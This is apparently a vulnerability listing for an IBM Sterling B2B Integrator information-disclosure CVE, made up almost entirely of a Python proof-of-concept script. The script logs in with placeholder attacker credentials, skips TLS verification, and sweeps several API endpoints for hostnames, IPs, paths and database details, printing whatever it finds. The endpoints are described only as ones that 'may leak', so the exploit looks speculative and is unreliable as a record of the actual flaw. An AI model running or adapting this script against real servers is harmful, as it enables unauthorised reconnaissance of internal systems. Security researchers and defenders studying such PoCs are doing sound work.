CVE-2025-14483 | IBM Sterling B2B Integrator敏感信息泄露漏洞

# CVE-2025-14483 PoC - IBM Sterling Information Disclosure # This PoC demonstrates how an authenticated user can trigger information disclosure import requests import json TARGET_URL = "https://target-ibm-sterling.example.com" USERNAME = "attacker" PASSWORD = "password123" def login(): """Authenticate to the IBM Sterling application""" session = requests.Session() login_url = f"{TARGET_URL}/ SterlingAPI/login" login_data = { "username": USERNAME, "password": PASSWORD } response = session.post(login_url, json=login_data, verify=False) if response.status_code == 200: return session return None def exploit_information_disclosure(session): """Exploit CVE-2025-14483 to disclose sensitive host information""" # Target endpoints that may leak host information endpoints = [ "/ SterlingAPI/system/config", "/ SterlingAPI/system/info", "/ SterlingAPI/network/routes", "/ SterlingAPI/server/status" ] leaked_info = [] for endpoint in endpoints: try: response = session.get(f"{TARGET_URL}{endpoint}", timeout=10) if response.status_code == 200: data = response.json() # Check for sensitive information in response if any(key in str(data).lower() for key in ['hostname', 'ip', 'internal', 'server', 'path', 'database']): leaked_info.append({ "endpoint": endpoint, "data": data }) print(f"[+] Sensitive info leaked from: {endpoint}") print(f" Data: {json.dumps(data, indent=2)}") except requests.RequestException as e: print(f"[-] Error accessing {endpoint}: {e}") return leaked_info if __name__ == "__main__": print("[*] CVE-2025-14483 - IBM Sterling Information Disclosure") print("[*] Authenticating to target...") session = login() if session: print("[+] Authentication successful") print("[*] Exploiting information disclosure...") results = exploit_information_disclosure(session) if results: print(f"\n[!] Leaked {len(results)} sensitive information items") else: print("[-] No sensitive information found") else: print("[-] Authentication failed")